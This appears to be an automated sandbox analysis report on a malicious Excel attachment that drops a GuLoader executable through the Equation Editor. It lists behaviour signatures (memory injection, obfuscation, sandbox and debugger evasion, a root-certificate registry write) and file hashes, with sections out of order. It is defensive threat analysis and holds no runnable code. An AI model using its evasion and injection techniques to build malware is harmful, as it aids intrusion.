Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B2615	9_2_001B2615
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B2009	9_2_001B2009
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B9A38	9_2_001B9A38
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B7C4D	9_2_001B7C4D
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B286A	9_2_001B286A
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B506A	9_2_001B506A
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B4E68	9_2_001B4E68
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B9A9F	9_2_001B9A9F
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B0886	9_2_001B0886
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B2ABC	9_2_001B2ABC
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B32AD	9_2_001B32AD
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B04CB	9_2_001B04CB
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B58CA	9_2_001B58CA
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B32C0	9_2_001B32C0
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B50E1	9_2_001B50E1
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B331E	9_2_001B331E
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B2D00	9_2_001B2D00
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B2F32	9_2_001B2F32
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B312B	9_2_001B312B
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B7978	9_2_001B7978
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B3172	9_2_001B3172
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B2B94	9_2_001B2B94
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B1FBE	9_2_001B1FBE
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B2FAC	9_2_001B2FAC
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B99A3	9_2_001B99A3
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B09A0	9_2_001B09A0
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B9BC2	9_2_001B9BC2
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B07ED	9_2_001B07ED
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B99E0	9_2_001B99E0

Contains functionality to call native functions

Source: C:\Users\Public\vbc.exe	Code function: 6_2_023594E2 NtProtectVirtualMemory,	6_2_023594E2
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02354559 NtWriteVirtualMemory,	6_2_02354559
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02355B9A NtAllocateVirtualMemory,LoadLibraryA,	6_2_02355B9A
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02350DC2 CloseServiceHandle,NtWriteVirtualMemory,TerminateProcess,LoadLibraryA,	6_2_02350DC2
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02354C22 NtWriteVirtualMemory,	6_2_02354C22
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0235520E NtWriteVirtualMemory,	6_2_0235520E
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02355C7F NtAllocateVirtualMemory,	6_2_02355C7F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0235506A NtWriteVirtualMemory,	6_2_0235506A
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0235464E NtWriteVirtualMemory,	6_2_0235464E
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02354AAC NtWriteVirtualMemory,	6_2_02354AAC
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02354EF8 NtWriteVirtualMemory,	6_2_02354EF8
Source: C:\Users\Public\vbc.exe	Code function: 6_2_023550E1 NtWriteVirtualMemory,	6_2_023550E1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_023544E2 NtWriteVirtualMemory,	6_2_023544E2
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02355CEC NtAllocateVirtualMemory,	6_2_02355CEC
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02359531 NtProtectVirtualMemory,	6_2_02359531
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02354932 NtWriteVirtualMemory,	6_2_02354932
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02358376 NtWriteVirtualMemory,LoadLibraryA,	6_2_02358376
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02357B4F NtWriteVirtualMemory,	6_2_02357B4F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02355B4A NtAllocateVirtualMemory,	6_2_02355B4A
Source: C:\Users\Public\vbc.exe	Code function: 6_2_023547BA NtWriteVirtualMemory,	6_2_023547BA
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02353793 NtWriteVirtualMemory,	6_2_02353793
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02354D92 NtWriteVirtualMemory,	6_2_02354D92
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B5B9A NtAllocateVirtualMemory,	9_2_001B5B9A
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B5C7F NtAllocateVirtualMemory,	9_2_001B5C7F
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B5CEC NtAllocateVirtualMemory,	9_2_001B5CEC

Abnormal high CPU Usage

Source: C:\Users\Public\vbc.exe

Process Stats: CPU usage > 98%

PE file contains strange resources

Source: vbc[1].exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Users\Public\vbc.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior

Source: ORDER RFQ1009202.xlsx	Virustotal: Detection: 35%
Source: ORDER RFQ1009202.xlsx	ReversingLabs: Detection: 27%

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: C:\Users\Public\vbc.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$ORDER RFQ1009202.xlsx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVREDA8.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSX@6/21@1/2

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: vbc.exe, 00000006.00000002.618930050.00000000031D0000.00000002.00020000.sdmp

Binary or memory string: .VBPud<_

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Data Obfuscation:

Yara detected GuLoader

Source: Yara match	File source: 00000006.00000002.618790028.0000000002350000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.688116507.00000000001B0000.00000040.00000001.sdmp, type: MEMORY

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\Public\vbc.exe	Code function: 6_2_00405002 push eax; iretd	6_2_00405004
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0040201C push eax; ret	6_2_0040201D
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00403A30 push ds; iretd	6_2_00403A3F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00404ADA push eax; iretd	6_2_00404ADC
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00405A85 push ebx; iretd	6_2_00405A86
Source: C:\Users\Public\vbc.exe	Code function: 6_2_004044A2 push ebx; iretd	6_2_004044A6
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00401CAA pushad ; ret	6_2_00401CB8
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00404536 push FFFFFFD1h; ret	6_2_00404538
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00401FC6 pushad ; retf	6_2_00401FC7
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00404DDE push eax; retf	6_2_00404DE0
Source: C:\Users\Public\vbc.exe	Code function: 6_2_004039EA push ds; iretd	6_2_00403A3F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_004023FD push es; ret	6_2_004023FE
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00402D8C push edx; retf	6_2_00402D8D
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0040219D push ebx; iretd	6_2_004021AE
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0235A406 push esp; ret	6_2_0235A407
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0235A402 push esp; ret	6_2_0235A403
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0235A40A push esp; ret	6_2_0235A40B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0235A3F6 push esp; ret	6_2_0235A3F7
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0235A3F2 push esp; ret	6_2_0235A3F3
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0235A3FE push esp; ret	6_2_0235A3FF
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0235A3FA push esp; ret	6_2_0235A3FB
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0235A3EE push esp; ret	6_2_0235A3EF
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0235A3EA push esp; ret	6_2_0235A3EB
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0235A3C8 push esp; ret	6_2_0235A3E7
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001BA40A push esp; ret	9_2_001BA40B
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001BA402 push esp; ret	9_2_001BA403
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001BA406 push esp; ret	9_2_001BA407
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B8E4C push eax; ret	9_2_001B8E4D
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B4CE7 pushad ; iretd	9_2_001B4CE8
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B8F9A push edx; ret	9_2_001B8FA1
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001BA3FA push esp; ret	9_2_001BA3FB

Persistence and Installation Behavior:

Drops PE files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Drops PE files to the user directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Stores large binary data to the registry

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Jump to behavior

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect Any.run

Source: C:\Users\Public\vbc.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe			Jump to behavior
Source: C:\Users\Public\vbc.exe	File opened: C:\Program Files\qga\qga.exe			Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: vbc.exe, 00000006.00000002.618813971.0000000002360000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
Source: vbc.exe, 00000006.00000002.618813971.0000000002360000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\Public\vbc.exe

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2904

Thread sleep time: -300000s >= -30000s

Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\Public\vbc.exe

Code function: 6_2_02358221 rdtsc

6_2_02358221

Source: C:\Users\Public\vbc.exe

System information queried: ModuleInformation

Jump to behavior

Source: vbc.exe, 00000006.00000002.618813971.0000000002360000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
Source: vbc.exe, 00000006.00000002.618813971.0000000002360000.00000004.00000001.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

Anti Debugging:

Hides threads from debuggers

Source: C:\Users\Public\vbc.exe

Thread information set: HideFromDebugger

Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\Public\vbc.exe

Code function: 6_2_02358221 rdtsc

6_2_02358221

Contains functionality to read the PEB

Source: C:\Users\Public\vbc.exe	Code function: 6_2_02353AB9 mov eax, dword ptr fs:[00000030h]	6_2_02353AB9
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02358A83 mov eax, dword ptr fs:[00000030h]	6_2_02358A83
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02352F36 mov eax, dword ptr fs:[00000030h]	6_2_02352F36
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02358B0B mov eax, dword ptr fs:[00000030h]	6_2_02358B0B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0235577C mov eax, dword ptr fs:[00000030h]	6_2_0235577C
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02357759 mov eax, dword ptr fs:[00000030h]	6_2_02357759
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02357DA9 mov eax, dword ptr fs:[00000030h]	6_2_02357DA9
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B2F32 mov eax, dword ptr fs:[00000030h]	9_2_001B2F32
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B7759 mov eax, dword ptr fs:[00000030h]	9_2_001B7759
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B577C mov eax, dword ptr fs:[00000030h]	9_2_001B577C
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B7DA9 mov eax, dword ptr fs:[00000030h]	9_2_001B7DA9

Checks if the current process is being debugged

Source: C:\Users\Public\vbc.exe

Process queried: DebugPort

Jump to behavior

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Users\Public\vbc.exe

Code function: 6_2_023567FF LdrInitializeThunk,

6_2_023567FF

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'			Jump to behavior

Source: vbc.exe, 00000009.00000002.688204304.0000000000BC0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000009.00000002.688204304.0000000000BC0000.00000002.00020000.sdmp	Binary or memory string: !Progman
Source: vbc.exe, 00000009.00000002.688204304.0000000000BC0000.00000002.00020000.sdmp	Binary or memory string: Program Manager<

Stealing of Sensitive Information:

GuLoader behavior detected

Source: Initial file

Signature Results: GuLoader behavior

ID:	483003
Product:	CloudBasic
Start time:	12:15:59
Start date:	14.09.2021
Sample:	ORDER RFQ1009202.xlsx
Cookbook:	defaultwindowsofficecookbook.jbs
System description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Architecture:	WINDOWS
MD5:	f60722f1276c17d3730a51d325e38e4f
SHA1:	db5bff43471b8729d3da739d85d156f586fd4ece
SHA256:	065e796cb07c1408bca1859b5ca5fae93d8bd6d145e0a547b9916f226c6d7fa8
Filetype:	Generic OLE2 / Multistream Compound File (8008/1) 100.00%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	PE32 executable (GUI) Intel 80386, for MS Windows	4399C694E88F3F32D22D91C6C4A173ED	FA50DF0581C5591073C6C48D5DFCF575FA272198	90FDCC08F9912AB5FA918A6CAAB5E23D76BA61A869C533EA507E1CCD81A7DD00
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\172EEB4D.jpeg	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3	E8FC908D33C78AAAD1D06E865FC9F9B0	72CA86D260330FC32246D28349C07933E427065D	7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1CB70D9B.png	PNG image data, 613 x 80, 8-bit/color RGBA, non-interlaced	E2267BEF7933F02C009EAEFC464EB83D	ACFEECE4B83B30C8B38BEB4E5954B075EAF756AE	BF5DF4A66D0C02D43BB4AC423D0B50831A83CDB8E8C23CF36EAC8D79383AA2A7
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\26C6B888.png	PNG image data, 684 x 477, 8-bit/color RGBA, non-interlaced	613C306C3CC7C3367595D71BEECD5DE4	CB5E280A2B1F4F1650040842BACC9D3DF916275E	A76D01A33A00E98ACD33BEE9FBE342479EBDA9438C922FE264DC0F1847134294
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2AE58EE9.jpeg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=2], baseline, precision 8, 474x379, frames 3	971312D4A6C9BE9B496160215FE59C19	D8AA41C7D43DAAEA305F50ACF0B34901486438BE	4532AEED5A1EB543882653D009593822781976F5959204C87A277887B8DEB961
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2F879DF.jpeg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3	738BDB90A9D8929A5FB2D06775F3336F	6A92C54218BFBEF83371E825D6B68D4F896C0DCE	8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\427D317C.jpeg	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3	F06432656347B7042C803FE58F4043E1	4BD52B10B24EADECA4B227969170C1D06626A639	409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4A496BE.emf	Windows Enhanced Metafile (EMF) image data version 0x10000	3554C9613971029E8DCF260667989F95	8AC68A6DF51DD4046DB89E0FCE2E6E54ED138D02	3BA6C0370AC4F6588B5809C32A98AEE353822EA1FBE448477BC804B25612C925
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\88F95BA7.jpeg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3	738BDB90A9D8929A5FB2D06775F3336F	6A92C54218BFBEF83371E825D6B68D4F896C0DCE	8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8E7A67E3.png	PNG image data, 613 x 80, 8-bit/color RGBA, non-interlaced	E2267BEF7933F02C009EAEFC464EB83D	ACFEECE4B83B30C8B38BEB4E5954B075EAF756AE	BF5DF4A66D0C02D43BB4AC423D0B50831A83CDB8E8C23CF36EAC8D79383AA2A7
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\91D8F771.emf	Windows Enhanced Metafile (EMF) image data version 0x10000	E4ED5B488F68649C13F0BCBA9C6CB1CA	7E3925CCD54B9A28E843BC8113104533E61088FE	5B0FF882D89EFAE34BE4D64E18199A1B84449CD5955A2B8F9F07C27F0792EBA2
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\995A17D6.png	PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced	208FD40D2F72D9AED77A86A44782E9E2	216B99E777ED782BDC3BFD1075DB90DFDDABD20F	CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A4BD1561.jpeg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=2], baseline, precision 8, 474x379, frames 3	971312D4A6C9BE9B496160215FE59C19	D8AA41C7D43DAAEA305F50ACF0B34901486438BE	4532AEED5A1EB543882653D009593822781976F5959204C87A277887B8DEB961
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B84A6782.png	PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced	63A6CB15B2B8ECD64F1158F5C8FBDCC8	8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6	AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B8DA72E0.png	PNG image data, 684 x 477, 8-bit/color RGBA, non-interlaced	613C306C3CC7C3367595D71BEECD5DE4	CB5E280A2B1F4F1650040842BACC9D3DF916275E	A76D01A33A00E98ACD33BEE9FBE342479EBDA9438C922FE264DC0F1847134294
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CA97BBEE.png	PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced	208FD40D2F72D9AED77A86A44782E9E2	216B99E777ED782BDC3BFD1075DB90DFDDABD20F	CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D9A7A0EA.png	PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced	63A6CB15B2B8ECD64F1158F5C8FBDCC8	8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6	AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DF40A54.jpeg	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3	F06432656347B7042C803FE58F4043E1	4BD52B10B24EADECA4B227969170C1D06626A639	409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F3B5FE45.jpeg	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3	E8FC908D33C78AAAD1D06E865FC9F9B0	72CA86D260330FC32246D28349C07933E427065D	7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
C:\Users\user\Desktop\~$ORDER RFQ1009202.xlsx	data	96114D75E30EBD26B572C1FC83D1D02E	A44EEBDA5EB09862AC46346227F06F8CFAF19407	0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
C:\Users\Public\vbc.exe	PE32 executable (GUI) Intel 80386, for MS Windows	4399C694E88F3F32D22D91C6C4A173ED	FA50DF0581C5591073C6C48D5DFCF575FA272198	90FDCC08F9912AB5FA918A6CAAB5E23D76BA61A869C533EA507E1CCD81A7DD00

Windows Analysis Report ORDER RFQ1009202.xlsx

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Exploits:

Compliance:

Software Vulnerabilities:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

